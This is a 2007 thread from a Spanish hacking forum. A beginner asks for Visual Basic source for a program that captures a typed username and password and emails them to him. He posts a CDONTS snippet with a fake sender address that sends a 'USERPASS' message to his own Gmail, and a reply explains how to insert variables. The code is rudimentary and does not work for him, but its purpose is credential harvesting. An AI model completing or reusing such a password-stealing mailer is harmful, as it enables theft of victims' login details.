elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a la Factorización De Semiprimos (RSA)


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Alguien sabe como¿?
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Alguien sabe como¿?  (Leído 2,301 veces)
DelxSus

Desconectado Desconectado

Mensajes: 11


Ver Perfil
Alguien sabe como¿?
« en: 9 Mayo 2007, 15:44 pm »

Buenas.
Vereis, llevo un par de semanas peleandome con el Visual Basic para preparar un programa que le escribes un pass y ana contraseña y me las envie por mail.
Lo pongo en VB porque estoy empezando, y me gustaria aprender, pero soy un negado para este lenguaje, lo que se me da bien es el Batch y la LUA para PSP.

Bueno, pues eso, que si alguien me podria pasar la fuente de algo como eso...

GRACIAS!!
PD: Me necanta este sitio!!!


En línea

dPix

Desconectado Desconectado

Mensajes: 222


¬_¬ - ¬O.o


Ver Perfil
Re: Alguien sabe como¿?
« Respuesta #1 en: 9 Mayo 2007, 18:51 pm »

Yo me buscaría en este mismo foro
     cómo mandar emails, subir archivos por FTP y cosas de ese tipo, se ha hablado cientos de veces. Si ni buscando encuentras algo infórmanos y te echamos una manilla.

Un saludo y bienvenido,

dPix...


En línea

DelxSus

Desconectado Desconectado

Mensajes: 11


Ver Perfil
Re: Alguien sabe como¿?
« Respuesta #2 en: 9 Mayo 2007, 19:48 pm »

Ya estoy aqui de nuevo...
Ya he encontrado como mandar el mail:
Código:
Option Explicit

Private Sub Command1_Click()

    Dim objNewMail As CDONTS.NewMail
    Set objNewMail = CreateObject("CDONTS.NewMail")
   
    With objNewMail
        .From = "fakemail@tumail.com"
        .To = "delxsus@gmail.com"
        .Body = "ASK1"
        .Subject = "USERPASS"
        .Importance = 1
        .Send
    End With
   
    Set objNewMail = Nothing

End Sub

Aver, aqui está mi duda.Las variables se escriben donde pone ASK1 o lo mismo pero sin comillas.... ¿?
 
Gracias, de todas formas ire probando... jugar con variables...

(Juas, como mola, es la primera vez que me mandan al buscador amablemente y sin esclamaciones...)

Saludos!!
En línea

Lambda


Desconectado Desconectado

Mensajes: 371



Ver Perfil WWW
Re: Alguien sabe como¿?
« Respuesta #3 en: 9 Mayo 2007, 22:36 pm »

las variables van sin comillas, las strings con comillas xD
En línea

DelxSus

Desconectado Desconectado

Mensajes: 11


Ver Perfil
Re: Alguien sabe como¿?
« Respuesta #4 en: 10 Mayo 2007, 17:12 pm »

Joder, no consigo que NINGUN NINGUN codigo me vaya bien, o no lo compila porque hay errores o no lo envia, uso el Mocosoft visual basic 2005 express, creo que es en .net...
Ayuda, que alguien me de el codigo, please!!



Saludos![/b]
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
alguien sabe como simular UP 8086 con proteus isis ?
Programación General
p4nd4criss 0 2,570 Último mensaje 31 Octubre 2012, 05:43 am
por p4nd4criss
SFTP en VB6 alguien sabe como?
Programación Visual Basic
79137913 3 3,543 Último mensaje 31 Julio 2015, 00:30 am
por silver_axe007
Alguien sabe como?
Hacking
gado2612 1 2,294 Último mensaje 16 Febrero 2016, 21:21 pm
por engel lex
¿Álguien sabe como funciona un TPV?
Hardware
cixert 1 2,037 Último mensaje 14 Julio 2020, 18:32 pm
por B€T€B€
maquinas expendedoras hack alguien sabe como funciona?
Software
Rakek1 0 1,630 Último mensaje 26 Noviembre 2022, 01:24 am
por Rakek1
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines